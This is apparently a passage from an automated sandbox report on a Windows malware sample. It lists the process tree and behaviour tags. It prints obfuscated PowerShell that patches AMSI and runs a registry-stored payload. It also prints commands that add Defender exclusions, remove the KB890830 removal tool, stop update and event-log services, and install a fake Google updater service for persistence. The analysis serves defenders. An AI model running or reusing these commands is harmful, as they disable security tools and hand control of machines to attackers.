memory of 2600 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2608 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 2628 1992 dllhost.exe sysmon.exe PID 1992 wrote to memory of 2956 1992 dllhost.exe unsecapp.exe PID 1992 wrote to memory of 2964 1992 dllhost.exe sihost.exe PID 1992 wrote to memory of 2988 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 392 1992 dllhost.exe taskhostw.exe PID 1992 wrote to memory of 3176 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 3364 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 3456 1992 dllhost.exe Explorer.EXE PID 1992 wrote to memory of 3572 1992 dllhost.exe svchost.exe PID 1992 wrote to memory of 3748 1992 dllhost.exe DllHost.exe PID 1992 wrote to memory of 3940 1992 dllhost.exe RuntimeBroker.exe PID 1992 wrote to memory of 3852 1992 dllhost.exe RuntimeBroker.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1016
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{913f847a-2d76-4bd4-b1b3-e10e37e46ad9}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{54e8d8b2-ad3d-4609-9162-faf425077286}2⤵PID:5040
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:696
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1104
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1152 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qGizraFaxxBX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$oIvBKAthIcoQJj,[Parameter(Position=1)][Type]$MVRoQnyvSu)$rcDKxFFcljc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+[Char](116)+''+'e'+'d'+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+'e'+'',''+[Char](67)+'l'+[Char](97)+'ss'+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](83)+''+'e'+'a'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'l'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+'u'+''+'t'+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$rcDKxFFcljc.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$oIvBKAthIcoQJj).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+'a'+'g'+''+[Char](101)+'d');$rcDKxFFcljc.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+'ke',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+'id'+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'ual',$MVRoQnyvSu,$oIvBKAthIcoQJj).SetImplementationFlags('Run'+[Char](116)+'ime'+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $rcDKxFFcljc.CreateType();}$oAqcVToeAKEDm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2.'+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+'fe'+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'et'+'h'+''+[Char](111)+'d'+[Char](115)+'');$FNsKXqLRjKGcfu=$oAqcVToeAKEDm.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'Pr'+[Char](111)+'c'+'A'+''+'d'+''+'d'+''+'r'+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+''+','+'S'+[Char](116)+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FsmOXxUkagmJAWikCmN=qGizraFaxxBX @([String])([IntPtr]);$sjLUEoUSFIROFOCOazxlBb=qGizraFaxxBX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$irqdsawgzBS=$oAqcVToeAKEDm.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$qYkFwkfkpmVHcm=$FNsKXqLRjKGcfu.Invoke($Null,@([Object]$irqdsawgzBS,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+'a'+''+[Char](114)+'y'+'A'+'')));$xaHnaRyZGqWTObbjF=$FNsKXqLRjKGcfu.Invoke($Null,@([Object]$irqdsawgzBS,[Object]('V'+'i'+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+'ot'+[Char](101)+'c'+[Char](116)+'')));$LWCxpma=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qYkFwkfkpmVHcm,$FsmOXxUkagmJAWikCmN).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+'.'+[Char](100)+''+[Char](108)+'l');$phcVUgvURUikJPSDY=$FNsKXqLRjKGcfu.Invoke($Null,@([Object]$LWCxpma,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+'ffer')));$BZQjrCUOYI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xaHnaRyZGqWTObbjF,$sjLUEoUSFIROFOCOazxlBb).Invoke($phcVUgvURUikJPSDY,[uint32]8,4,[ref]$BZQjrCUOYI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$phcVUgvURUikJPSDY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xaHnaRyZGqWTObbjF,$sjLUEoUSFIROFOCOazxlBb).Invoke($phcVUgvURUikJPSDY,[uint32]8,0x20,[ref]$BZQjrCUOYI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('di'+'a'+'l'+[Char](101)+''+'r'+''+[Char](115)+''+'t'+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MNFEVnPHfDch{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rZtWgGeURlraAF,[Parameter(Position=1)][Type]$PEmFeQyZBp)$nknVGtpJuEd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+',Se'+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+'s'+'s'+','+[Char](65)+'ut'+'o'+'C'+'l'+''+'a'+''+'s'+'s',[MulticastDelegate]);$nknVGtpJuEd.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+'me,'+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+''+'u'+'b'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rZtWgGeURlraAF).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+'M'+'an'+'a'+'g'+'e'+''+[Char](100)+'');$nknVGtpJuEd.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+'b'+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$PEmFeQyZBp,$rZtWgGeURlraAF).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $nknVGtpJuEd.CreateType();}$yLfwPJgtHnVmj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'ll')}).GetType('Micr'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+'a'+'f'+'e'+[Char](78)+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+'tho'+'d'+''+[Char](115)+'');$ucShtxiyvcZRmj=$yLfwPJgtHnVmj.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dtXWFdtBTqqYHhsSEGn=MNFEVnPHfDch @([String])([IntPtr]);$vBBGxJFjUsJExitDRkyLKd=MNFEVnPHfDch @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LjixHFhwGBc=$yLfwPJgtHnVmj.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LQrdGGEkpoOrId=$ucShtxiyvcZRmj.Invoke($Null,@([Object]$LjixHFhwGBc,[Object](''+'L'+''+'o'+''+'a'+''+'d'+''+'L'+'i'+'b'+'r'+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$LQIlcwIGzGFsrKKZv=$ucShtxiyvcZRmj.Invoke($Null,@([Object]$LjixHFhwGBc,[Object](''+'V'+''+'i'+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+'o'+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$mBChEvl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LQrdGGEkpoOrId,$dtXWFdtBTqqYHhsSEGn).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$SqlZJkpkrLLbMpkyn=$ucShtxiyvcZRmj.Invoke($Null,@([Object]$mBChEvl,[Object](''+'A'+''+'m'+''+'s'+''+[Char](105)+''+[Char](83)+'ca'+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+'e'+''+'r'+'')));$nUlhbvCuMg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LQIlcwIGzGFsrKKZv,$vBBGxJFjUsJExitDRkyLKd).Invoke($SqlZJkpkrLLbMpkyn,[uint32]8,4,[ref]$nUlhbvCuMg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SqlZJkpkrLLbMpkyn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LQIlcwIGzGFsrKKZv,$vBBGxJFjUsJExitDRkyLKd).Invoke($SqlZJkpkrLLbMpkyn,[uint32]8,0x20,[ref]$nUlhbvCuMg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OFT'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'d'+''+'i'+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1724 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5064
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1268
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1436
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1584
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1736
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1876
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1888
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:884
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2568
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2608
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2628
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3364
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3456
-
C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe"C:\Users\Admin\AppData\Local\Temp\e4b86908861cd469bcba966d7230537ea1d0727d46c4fc8cb1262cced20f5b7c.exe"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:4884
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:4796
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:1132
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:4944
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1184
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4824
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:3860
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:3372
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"3⤵
- Launches sc.exe
PID:2748
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"3⤵
- Launches sc.exe
PID:4428 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2340
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3572
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3748
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3940
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4744
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1988
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4268
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2996
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:5056
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3196
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1772
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1364
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3168
-
C:\ProgramData\Google\Chrome\updater.exeC:\ProgramData\Google\Chrome\updater.exe1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5044 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3352 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2384
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:3108
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:796 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1012
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:740
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2940 -
